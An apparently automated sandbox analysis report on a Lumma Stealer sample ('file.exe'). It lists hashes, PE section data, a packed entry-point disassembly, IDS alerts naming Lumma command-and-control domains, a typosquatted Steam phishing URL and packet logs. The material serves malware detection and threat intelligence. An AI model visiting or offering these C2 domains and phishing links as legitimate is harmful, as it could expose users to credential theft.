sergei-esenin.com | file.exe | malicious | LummaC | 104.21.53.8
 | file.exe | malicious | LummaC | 172.67.206.204
 | file.exe | malicious | LummaC | 172.67.206.204
 | Setup.exe | malicious | LummaC | 172.67.206.204
 | Setup.exe | malicious | LummaC | 172.67.206.204
 | file.exe | malicious | LummaC | 104.21.53.8
 | Set-up.exe | malicious | LummaC | 104.21.53.8
 | file.exe | malicious | LummaC | 172.67.206.204
 | file.exe | malicious | LummaC | 104.21.53.8
 | file.exe | malicious | LummaC | 172.67.206.204
steamcommunity.com | https://steamcommunlty-gifts.com/s/HRAB | malicious | Unknown | 104.102.49.254
 | file.exe | malicious | LummaC | 104.102.49.254
 | file.exe | malicious | LummaC | 104.102.49.254
 | file.exe | malicious | LummaC | 104.102.49.254
 | file.exe | malicious | LummaC | 104.102.49.254
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                Set-up.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUShttps://business.helpcaseappealcenter.eu/community-standard/346299132520232Get hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                https://currenntlyattyah06.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.18.10.213
                                                                https://businesssupport248.mfb72024.click/Get hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                http://dmcaactionenforcement.vercel.app/1vWOyN7xZ2xSoDL=KwTQr2qM04lQpteT.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.26.4.15
                                                                http://bdvinformation.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.16.124.96
                                                                http://secureprotocol1.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.16.123.96
                                                                https://bantuan-customer-care-dana.officio.asia/Get hashmaliciousUnknownBrowse
                                                                • 172.67.207.178
                                                                https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                test.docGet hashmaliciousUnknownBrowse
                                                                • 104.20.4.235
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.21.53.8
                                                                AKAMAI-ASUShttps://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                debug.dbg.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 23.53.183.89
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                Set-up.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 104.102.49.254
                                                                • 172.67.206.204
                                                                No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.0176021884802195
Encrypted: false
SSDEEP: 192:Prrx7uslJbvjPlktS0BU/YP3juFRp+zuiFE+Z24IO8TOB:T1a2jN6ZBU/gjhzuiFLY4IO8C
MD5: 082808C53DE7A84D8AC9943AD5845910
SHA1: 8DF4E6CBAD973CB0A9078958F561780470B16729
SHA-256: A64BAA98DBF3309DF38E0094BEF01A7784BDE13A63D01B55D3B4D7663D531A5A
SHA-512: 5A50AD9BE2B35B512995385E7372839598370D06E415CFB58640746831CD069DDFF896026E0B349C79932A70000125D2A1BB7170857A1C079828D5175B8F760D
Malicious: true
Reputation: low
Preview: Version=1 EventType=APPCRASH EventTime=133733079762290087 ReportType=2 Consent=1 UploadTime=133733079768383841 ReportStatus=524384 ReportIdentifier=de226bca-5d07-408b-8189-7b2a945470e5 IntegratorReportIdentifier=cd1cfb80-c5a9-4c66-a04b-5fd97b1b2686 Wow64Host=34404 Wow64Guest=332 NsAppName=file.exe AppSessionGuid=00001cb8-0001-0014-aad7-1306871ddb01 TargetAppId=W:00067e492d768e79731624bcdf2e7615f9180000ffff!00001564f87b3da33b611dcb92dd5ff7362220af474a!file.exe TargetAppVer=2024//10

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Sun Oct 13 15:46:16 2024, 0x1205a4 type
Category: dropped
Size (bytes): 280496
Entropy (8bit): 1.487412388111131
Encrypted: false
SSDEEP: 1536:aFKwo3aK5Jh8CMjTAKE2bhgxbKoJ9JLmeR:Wq3aK5Jh8CMjTAKE2lgNKQ99
MD5: 6AD311B21E18C65A06A390BDC7C70D42
SHA1: 5B2256E0A3289FC84A604AC971BA71E17800C139
SHA-256: 3D7985102F66DFEB4C252E7F7049666439A89C52F545F1F52B442AF1B04CB03A
SHA-512: C5A54F9151DBDB2B1B570C8D9D2EBFE49FDA40B4479B882630BC737C452B1E33595423658809873C0BB474FD080B1031768EF52C184FE2BD7839C13650CE1DD2
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8298
Entropy (8bit): 3.6912922956401646
Encrypted: false
SSDEEP: 192:R6l7wVeJBCL6fJVO6YNySU9sOgmfBGe3pr/89b07sfZ8m:R6lXJ46fJVO6YYSU9sOgmfZa0Af3
MD5: 736843012FD1962B22F758C52A57C36C
SHA1: A247475023F7DC5D46B63437C07C6E36040D293F
SHA-256: 44B97C9C780DA53D4AAB14EF3A041FC1979CAF9A771F6E138D807A4745ABEACA
SHA-512: 3289E3F65A6DD66E5ADDA4EA380595422DD4DD10A89160789B54856CC3EFFAFEC6A9313588E620E4DDA1DD40ED9FBD4160D980314516F670F96A23B61AB1D98C
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7352</Pi

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4542
Entropy (8bit): 4.423408383310221
Encrypted: false
SSDEEP: 48:cvIwWl8zsuJg77aI9EnWpW8VYe5Ym8M4JjlFg+q8CzxuMhgd:uIjfkI7aW7VqJ8jx9gd
MD5: D8080A148B8857B394B8561E43310FBE
SHA1: DC0DCED08A650BAB08C8DA85E939A2994D9972AF
SHA-256: ED7A4F16B3EE2F3F5CF15BD55D6B72E02275EAEBD6F9F0937F314DFE7E01E66E
SHA-512: 251E402F2630EFF6077FD13256C4BD0425A70E3D6184BCBE6E06A70CE22E085A27295B2AB67809967DA7B5A66E7A8644331853CFC7CEC85C9A842DFCC4599B51
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <req ver="2"> <tlm> <src> <desc> <mach> <os> <arg nm="vermaj" val="10" /> <arg nm="vermin" val="0" /> <arg nm="verbld" val="19045" /> <arg nm="vercsdbld" val="2006" /> <arg nm="verqfe" val="2006" /> <arg nm="csdbld" val="2006" /> <arg nm="versp" val="0" /> <arg nm="arch" val="9" /> <arg nm="lcid" val="2057" /> <arg nm="geoid" val="223" /> <arg nm="sku" val="48" /> <arg nm="domain" val="0" /> <arg nm="prodsuite" val="256" /> <arg nm="ntprodtype" val="1" /> <arg nm="platid" val="2" /> <arg nm="tmsi" val="541848" /> <arg nm="osinsty" val="1" /> <arg nm="iever" val="11.789.19041.0-11.0.1000" /> <arg nm="portos" val="0" /> <arg nm="ram" val="409

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.416541255023791
Encrypted: false
SSDEEP: 6144:Wcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuN85+:zi58oSWIZBk2MM6AFBqo
MD5: 90AFCCEE1DEE020BA13D814E07AD7D8B
SHA1: AC6F1B36AFB22150FE7EC6B4F966E83132F7FD98
SHA-256: CEDD8F8424ACE511968BA41BE08398A374D0663AF6C8DBA5D2E124574ACA9ECD
SHA-512: DF79D433CE6F9712CF8FD6289571769910A2F99CB87A572BE5049670087145BA413A6AD8ECA6D33B8A6FDFFEF43309223338328D40931420B87D9DE3460CD6BF
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.947845726882369
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'844'224 bytes
MD5: fb08a9067fae7bfd248416c863bd43d2
SHA1: 1564f87b3da33b611dcb92dd5ff7362220af474a
SHA256: b649fde943868879f85d809bf5e84d9873b1c5ed308941e19cebb3ea6a230aff
SHA512: 18d98d84e5df556e0adcf32cd0cdefece4a6266932f7198878b8478662131e855dd4980b002f82ed12d9423345143ba88778055b722767f985dadde67f77ecac
SSDEEP: 49152:JfEALDRjDiP2QRjbTVg4txzU6PhCbnog:JfEwRjDinRjbTXvwyH
TLSH: 5B8533BB342AA7B9C51C8571745BFBD449B5065A92E6C3403EC75BD8803A2D34F2EB83
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f..............................J...........@..........................0J.....z.....@.................................W...k..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x8a0000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007F2CB51B0ADAh
lar ebx, word ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F2CB51B2AD5h
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pushad
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop ds
add byte ptr [eax+000000FEh], ah
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5f057 | 0x6b | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5f1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x5d000 | 0x25e00 | 97cc3cc9ca8f28e98ab1518b6dcbe2a9 | False | 0.9995681208745875 | data | 7.978134199396537 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x5e000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x5f000 | 0x1000 | 0x200 | fe72def8b74193a84232a780098a7ce0 | False | 0.150390625 | data | 1.04205214219471 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x60000 | 0x2a6000 | 0x200 | 4ab9aa01c460fd94b03b22970d48dfbe | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
achgldqf | 0x306000 | 0x199000 | 0x198c00 | 53033d796b998aea1add3228fc969296 | False | 0.9941400277140673 | data | 7.953550554891692 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
oujhmehu | 0x49f000 | 0x1000 | 0x400 | 096b356909754fbc4193dbf66c3bfdaa | False | 0.76953125 | data | 6.08201160630928 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4a0000 | 0x3000 | 0x2200 | ea93898528b1a4c0b00d866554f14b9d | False | 0.07950367647058823 | DOS executable (COM) | 1.001241834918481 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-13T17:46:12.993655+0200 | 2056471 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) | 1 | 192.168.2.7 | 59340 | 1.1.1.1 | 53 | UDP
2024-10-13T17:46:13.143968+0200 | 2056485 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) | 1 | 192.168.2.7 | 61611 | 1.1.1.1 | 53 | UDP
2024-10-13T17:46:13.157597+0200 | 2056483 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) | 1 | 192.168.2.7 | 55704 | 1.1.1.1 | 53 | UDP
2024-10-13T17:46:13.171047+0200 | 2056481 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) | 1 | 192.168.2.7 | 64781 | 1.1.1.1 | 53 | UDP
2024-10-13T17:46:13.182860+0200 | 2056479 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) | 1 | 192.168.2.7 | 51538 | 1.1.1.1 | 53 | UDP
2024-10-13T17:46:13.202147+0200 | 2056477 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) | 1 | 192.168.2.7 | 53860 | 1.1.1.1 | 53 | UDP
2024-10-13T17:46:13.214638+0200 | 2056475 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) | 1 | 192.168.2.7 | 60932 | 1.1.1.1 | 53 | UDP
2024-10-13T17:46:13.225766+0200 | 2056473 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) | 1 | 192.168.2.7 | 57019 | 1.1.1.1 | 53 | UDP
2024-10-13T17:46:14.500243+0200 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.7 | 49709 | 104.102.49.254 | 443 | TCP
2024-10-13T17:46:15.252363+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49714 | 172.67.206.204 | 443 | TCP
2024-10-13T17:46:15.252363+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49714 | 172.67.206.204 | 443 | TCP
2024-10-13T17:46:16.505914+0200 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49719 | 172.67.206.204 | 443 | TCP
2024-10-13T17:46:16.505914+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49719 | 172.67.206.204 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2024 17:46:13.250917912 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:13.250938892 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:13.251013041 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:13.255172968 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:13.255186081 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:13.962594032 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:13.962711096 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:13.965466022 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:13.965471029 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:13.965766907 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.017307043 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:14.020483971 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:14.067394018 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.500222921 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.500245094 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.500252008 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.500266075 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.500272036 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.500293970 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:14.500312090 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.500325918 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:14.500360012 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:14.630881071 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.630966902 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.631104946 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:14.631125927 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.631170034 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:14.637578011 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.637675047 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:14.637686968 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.637737036 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:14.637742996 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.637835026 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.637892962 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:14.638649940 CEST | 49709 | 443 | 192.168.2.7 | 104.102.49.254
Oct 13, 2024 17:46:14.638669014 CEST | 443 | 49709 | 104.102.49.254 | 192.168.2.7
Oct 13, 2024 17:46:14.650664091 CEST | 49714 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:14.650706053 CEST | 443 | 49714 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:14.650815964 CEST | 49714 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:14.651196957 CEST | 49714 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:14.651209116 CEST | 443 | 49714 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:15.132539034 CEST | 443 | 49714 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:15.132616997 CEST | 49714 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:15.134500027 CEST | 49714 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:15.134511948 CEST | 443 | 49714 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:15.134802103 CEST | 443 | 49714 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:15.136128902 CEST | 49714 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:15.136157036 CEST | 49714 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:15.136209965 CEST | 443 | 49714 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:15.252424002 CEST | 443 | 49714 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:15.252579927 CEST | 443 | 49714 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:15.252677917 CEST | 443 | 49714 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:15.252770901 CEST | 443 | 49714 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:15.252778053 CEST | 49714 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:15.252799034 CEST | 443 | 49714 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:15.252821922 CEST | 49714 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:15.252988100 CEST | 443 | 49714 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:15.253043890 CEST | 49714 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:15.255549908 CEST | 49714 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:15.255565882 CEST | 443 | 49714 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:15.255570889 CEST | 49714 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:15.255575895 CEST | 443 | 49714 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:15.580596924 CEST | 49719 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:15.580646992 CEST | 443 | 49719 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:15.580712080 CEST | 49719 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:15.585617065 CEST | 49719 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:15.585635900 CEST | 443 | 49719 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:16.052510023 CEST | 443 | 49719 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:16.052584887 CEST | 49719 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:16.062814951 CEST | 49719 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:16.062834978 CEST | 443 | 49719 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:16.063121080 CEST | 443 | 49719 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:16.064563990 CEST | 49719 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:16.064600945 CEST | 49719 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:16.064639091 CEST | 443 | 49719 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:16.505922079 CEST | 443 | 49719 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:16.505994081 CEST | 443 | 49719 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:16.506186962 CEST | 49719 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:16.506393909 CEST | 49719 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:16.506408930 CEST | 443 | 49719 | 172.67.206.204 | 192.168.2.7
Oct 13, 2024 17:46:16.506433010 CEST | 49719 | 443 | 192.168.2.7 | 172.67.206.204
Oct 13, 2024 17:46:16.506438017 CEST | 443 | 49719 | 172.67.206.204 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2024 17:46:12.993654966 CEST | 59340 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 17:46:13.137964964 CEST | 53 | 59340 | 1.1.1.1 | 192.168.2.7
Oct 13, 2024 17:46:13.143968105 CEST | 61611 | 53 | 192.168.2.7 | 1.1.1.1
Oct 13, 2024 17:46:13.154751062 CEST | 53 | 61611 | 1.1.1.1 | 192.168.2.7
